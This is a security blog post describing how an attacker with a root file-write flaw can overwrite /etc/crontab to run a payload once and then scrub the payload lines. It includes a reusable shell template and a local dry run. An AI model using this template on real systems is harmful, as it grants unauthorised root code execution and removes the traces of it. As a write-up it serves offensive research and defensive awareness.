
War Room

Shells from above


Crontab One Time Payload Execution

September 21, 2015 By Spencer

Recently, I was writing an exploit for a vulnerability that I had discovered in a Linux-based server application. The flaw, when successfully exploited, allowed a file to be written anywhere on the file system with the permissions of the user running the server. The application I was targeting was often run as root in order to bind to a privileged port, and it offered no way to drop privileges after doing so, so an arbitrary file write as root was on the table.

After completing a proof-of-concept exploit that wrote a simple text file to the root user's home directory, I immediately wanted to explore options for turning this write primitive into code execution. The technique I settled on overwrote the existing /etc/crontab with one that executed my command payload. Being of sound body and mind, I generally want my shells delivered as soon as possible. For a payload executed by the cron daemon, that means scheduling the command to run every minute, which may result in "too many" shells, if such a thing exists.

To avoid having the payload executed more than once, I crafted a crontab file that executes one or more commands at the next minute change and then removes the malicious lines from the file. By removing those lines, the payload cleans up after itself and is never run again. I achieved this with an inverted grep (the -v flag) that filters out the every-minute lines and writes the remaining lines back to the file. Two practical points: the filtered output has to pass through a temporary file (or a tool such as sed -i) rather than a plain grep -v ... /etc/crontab > /etc/crontab, since the redirection would truncate the file before grep reads it; and because the whole of /etc/crontab is overwritten, anything that was already scheduled there is lost unless it is reproduced in the file you write. Cron notices the rewritten file by its modification time, so the cleaned-up version takes effect from the next minute.

The final result is a template crontab file that can be reused in similar situations to execute a payload once, at the next minute boundary. The command to be executed as the payload needs to be inserted on line 15 of the template. Additional commands can be executed by adding further lines with the same */1 * * * * root prefix (*/1 is equivalent to * in the minute field, and root is the user field that /etc/crontab and /etc/cron.d entries carry, unlike per-user crontabs).
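The template itself is not reproduced on this page. What follows is an added example in the same spirit, not the author's file: a /bin/sh script that generates a one-shot /etc/crontab whose cleanup line uses grep -v to strip every line tagged with a marker, plus a dry run of that cleanup against a temporary file so it can be checked without root or a running cron. The marker string (#ONESHOT), the payload command, the temporary-file path and the preserved run-parts entry are all assumptions.

```shell
#!/bin/sh
# Added example (not the author's template): build a one-shot /etc/crontab
# that runs a payload at the next minute boundary and then removes its own
# lines. CRONTAB, MARKER and the payload are assumptions.

CRONTAB="${CRONTAB:-/etc/crontab}"
MARKER='#ONESHOT'   # tags every line the cleanup job must strip

# Emit the complete crontab on stdout. $1 is the payload command.
# /etc/crontab lines carry a user field: min hour dom mon dow user command.
# The whole file replaces the original, so any existing entries that should
# survive have to be reproduced here (the run-parts line stands in for them).
# cron hands the command field to SHELL, so the trailing "#ONESHOT" is just a
# shell comment to the payload while still being greppable in the file.
build_crontab() {
    payload="$1"
    cat <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Standard entry kept from the distribution's file (assumed content).
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly

# One-shot payload and its cleanup. Both fire in the same minute; cron forks
# each job separately, so the cleanup rewriting this file does not affect the
# already-running payload. Output goes through a temp file because a plain
# "grep -v ... $CRONTAB > $CRONTAB" would truncate the input first.
*/1 * * * * root $payload $MARKER
*/1 * * * * root grep -v '$MARKER' $CRONTAB > $CRONTAB.tmp && mv $CRONTAB.tmp $CRONTAB $MARKER
EOF
}

# Local dry run (no root, no cron): write the template to a temp file, apply
# the same grep -v rewrite the cleanup line performs, and report
# "<marker lines before> <marker lines after> <standard entries kept>".
simulate_cleanup() {
    tmp=$(mktemp)
    build_crontab "/bin/sh -c 'id > /tmp/oneshot.out'" > "$tmp"
    before=$(grep -c "$MARKER" "$tmp" || true)
    grep -v "$MARKER" "$tmp" > "$tmp.new" && mv "$tmp.new" "$tmp"
    after=$(grep -c "$MARKER" "$tmp" || true)
    kept=$(grep -c 'run-parts' "$tmp" || true)
    rm -f "$tmp"
    echo "$before $after $kept"
}

# Real use (as root, via the file-write primitive):
#   build_crontab "/bin/sh -c 'id > /tmp/oneshot.out'" > /etc/crontab
simulate_cleanup
```

Two cron-specific gotchas worth keeping in mind when adapting this: a literal % in the command field is translated to a newline by cron, so payloads containing one must escape it as \%, and the file should end with a newline so the last entry is parsed.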
